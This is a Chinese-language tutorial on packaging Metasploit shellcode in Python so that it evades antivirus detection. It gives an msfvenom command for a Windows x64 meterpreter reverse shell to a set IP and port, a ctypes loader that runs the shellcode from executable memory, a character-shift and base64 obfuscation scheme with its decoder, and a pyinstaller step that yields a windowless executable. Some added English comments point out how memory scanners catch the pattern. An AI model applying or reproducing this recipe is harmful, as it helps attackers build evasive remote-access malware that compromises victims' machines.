python免杀shellcode案例

简单的病毒绕过免杀,完成加壳操作

  • kali构造payload
    msfvenom –platform windows –a x64  -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.18.184 LPORT=4444 -f py -o shellcode2.py

  • 放置python执行,注意这是64位系统
    # Raw payload bytes as emitted by msfvenom -f py; the page shows only a truncated prefix,
    # so this listing does not run as pasted.
    buf = b"\x4d\x5a\x41\x52\x55\......."
    
    import ctypes
    shellcode = buf
    # bytearray is a writable buffer, which from_buffer() below requires.
    shellcode = bytearray(shellcode)
    # Set VirtualAlloc's return type to ctypes.c_uint64 so the 64-bit pointer is not truncated
    # to the default c_int.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64  # commenting this line out gives the 32-bit variant
    # Allocate memory: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # NOTE(review): a private RWX allocation that is then started as a thread is the textbook
    # pattern that memory scanners and EDR API hooks are built to flag; the bytes on disk are
    # the only thing the later string obfuscation step changes.
    # ctypes.windll exists only on Windows; on other platforms this line raises AttributeError.
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    # Copy the shellcode into the allocation. Note that `buf` is rebound here to a ctypes
    # view over the bytearray (no copy); later steps that read `buf` see this object.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(
        ctypes.c_uint64(ptr),
        buf,
        ctypes.c_int(len(shellcode))
    )
    # Create a thread whose start address is the first byte of the copied shellcode
    handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),  # lpThreadAttributes: default
        ctypes.c_int(0),  # dwStackSize: default
        ctypes.c_uint64(ptr),  # lpStartAddress
        ctypes.c_int(0),  # lpParameter
        ctypes.c_int(0),  # dwCreationFlags: start immediately
        ctypes.pointer(ctypes.c_int(0))  # lpThreadId: written and discarded
    )
    # Block until that thread exits; -1 is INFINITE. CreateThread's restype was not set, so
    # `handle` is already a c_int-sized value — presumably fine while HANDLE values fit in
    # 32 bits, but not guaranteed; TODO confirm on x64.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 连接成功

 

  • 进行加密
    import binascii,base64
    # Bytes -> ASCII hex text. NOTE(review): if this step runs after the loader above, `buf`
    # is the ctypes c_char array rather than the original bytes object; b2a_hex accepts any
    # bytes-like object, so the output should be the same — TODO confirm.
    resv = binascii.b2a_hex(buf)
    # Work on str so the per-character shift in encode() can use ord()/chr().
    src = resv.decode()
    # print(res)
    def encode(src):
        """Print the base64 form of `src` after shifting every character up by 5 code points.

        `src` is expected to be the hex text built above. The result is printed, not
        returned, so the call below evaluates to None. This is a fixed-offset character
        substitution followed by base64 — obfuscation, not encryption: there is no key,
        and decode() reverses it unconditionally.
        """
        re = ''  # string accumulator; the name shadows the stdlib module `re`
        for r in src:
            new = chr(ord(r)+5)  # shift each character by 5 code points
            re += new
        res = base64.b64encode(re.encode()).decode()  # base64-encode the shifted text
        print(res)
    
    encode(src)

  • 进行解密并运行
    import ctypes,binascii,base64
    
    src = "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"
    def decode(src):
        """Reverse encode(): base64-decode `src`, shift every character down by 5, and
        parse the resulting hex text back into raw bytes.

        Args:
            src: the base64 string printed by encode().
        Returns:
            The original payload bytes.
        Raises:
            Presumably binascii.Error (a ValueError) when `src` is not valid base64 or the
            shifted text is not valid hex, and UnicodeDecodeError if the decoded bytes are
            not UTF-8 — none of these are handled here; TODO confirm.
        """
        res = base64.b64decode(src).decode()  # base64 -> shifted text
        # print(res)
        sr = ''
        for s in res:
            new = chr(ord(s) - 5)  # undo the +5 shift applied by encode()
            sr += new
        # print(sr)
        buf = binascii.a2b_hex(sr)  # hex text -> raw bytes
        return buf
    
    # Rebuild the plaintext payload in memory. NOTE(review): this means only the on-disk
    # byte pattern changes; the decode loop, the kernel32 call chain and the RWX memory below
    # are unchanged, which is what behavioural and memory-scan detections look at.
    buf = decode(src)
    
    # print(buf)
    
    shellcode = buf
    # bytearray is a writable buffer, which from_buffer() below requires.
    shellcode = bytearray(shellcode)
    # Set VirtualAlloc's return type to ctypes.c_uint64 so the 64-bit pointer is not truncated
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # Allocate memory: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # ctypes.windll exists only on Windows; on other platforms this line raises AttributeError.
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    # Copy the shellcode into the allocation; `buf` is rebound to a ctypes view over the bytearray.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(
        ctypes.c_uint64(ptr),
        buf,
        ctypes.c_int(len(shellcode))
    )
    # Create a thread whose start address is the first byte of the copied shellcode
    handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),  # lpThreadAttributes: default
        ctypes.c_int(0),  # dwStackSize: default
        ctypes.c_uint64(ptr),  # lpStartAddress
        ctypes.c_int(0),  # lpParameter
        ctypes.c_int(0),  # dwCreationFlags: start immediately
        ctypes.pointer(ctypes.c_int(0))  # lpThreadId: written and discarded
    )
    # Block until that thread exits; -1 is INFINITE. `handle` is narrowed to c_int, which is
    # presumably fine while HANDLE values fit in 32 bits — TODO confirm on x64.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 使用python命令打包
    pyinstaller -F -w payload.py 

     

     
